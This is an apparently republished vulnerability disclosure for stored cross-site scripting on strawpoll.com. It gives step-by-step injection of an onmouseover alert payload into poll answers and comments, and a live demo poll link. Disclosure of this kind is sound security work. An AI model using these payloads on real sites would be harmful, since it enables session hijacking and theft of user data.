strawpoll Xss Stored
2020-10-18 17:36:08 Author: cxsecurity.com(查看原文) 阅读量:158 收藏

############################0xSilver############################ # Exploit Author: @Meshari-Almalki # Exploit Title: Strawpoll - Cross Site Scripting (Stored) # Vendor: strawpoll.com # Date: 2020-10-18 # Software Version: * # Software Link: N/A # Google Dork: N/A ############################################################# [*] Vuln Info: ============== Cross-Site Scripting or XSS attack is a security exploitation in which an attacker places malicious client-end code onto a web page. Attackers using XSS vulnerabilities steal user data, or control user sessions, run malicious code or even use it as a major component of phishing scams. ############################################################# [*] Vuln poc ==================== [1] - Go to strawpoll.com [2] - Sign in and Create new poll [3] -Fill Answer Options with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [4] - Now you can see in top the payload will be execute when you mouse over it . ============================================================= [*] Another Exploit : [-] After create poll or visit any poll of another people [-] go to comment and send it with this payload ==> <a onmouseover="alert(document.domain)">0xSilver</a> [-] go to your comment after sent and click on delete , then mouse over it , will be execute ############################################################# [*] Demo: ========= https://strawpoll.com/sqvuggup3 <meta name="description" content="What's your opinion? Vote now: <a onmouseover="alert(document.domain)">0xSilver</a>, <a onmouseover="alert(document.domain)">0xSilver</a>" /> ############################################################# [*] Contact: ============ # Telegram: t.me/x0Saudi # Twitter: twitter.com/slv0d



 

Thanks for you comment!
Your message is in quarantine 48 hours.


文章来源: https://cxsecurity.com/issue/WLB-2020100107
如有侵权请联系:admin#unsafe.sh